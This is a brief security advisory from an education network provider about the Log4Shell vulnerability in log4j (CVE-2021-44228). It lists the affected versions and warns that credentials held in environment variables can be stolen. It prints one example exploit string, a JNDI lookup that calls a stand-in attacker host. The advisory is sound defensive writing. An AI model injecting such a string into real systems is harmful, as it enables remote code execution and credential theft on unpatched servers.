13/12/2021

Log4Shell Vulnerability (CVE-2021-44228) 

Summary

In the wake of the Log4Shell vulnerability - CVE-2021-44228, our support partner JISC have been monitoring network connectivity and looking for proactive ways to prevent exploitation.  

It is imperative to take into consideration the entire infrastructure when responding to this vulnerability, as a substantial number of applications use Log4J for logging.   

This vulnerability is being actively exploited and JISC are continuing to look for threat actors who may attempt to utilise this to their advantage. Once threat actors have been positively identified and depending on the IoC, blocks will be implemented on the Janet network and the Janet Network Resolver Service (JNRS) where possible. 

Key Considerations:

  • A substantial number of applications use Log4j for logging, attackers simply need to log a string to attempt the exploit. E.g. ${jndi:ldap://evil.xa/x}  
  • The exploit can also be used to read server environment variables. If Git credentials or AWS keys are set, they can be stolen without needing full Remote Code Execution (RCE) access.  

Vulnerable versions :

  • log4j between 2.0 and 2.14.1 are affected.  

Recommendation(s):  

References:

Questions:

If you have any questions or concerns about this advisory, please contact us via our support desk – support@empsn.org.uk

Keeping Up To Date With Us Is Easy, Sign Up To Our Newsletter Today!

Stay in touch with emPSN, so that you get the latest e-safety advice and invites to our community events.

    Our partners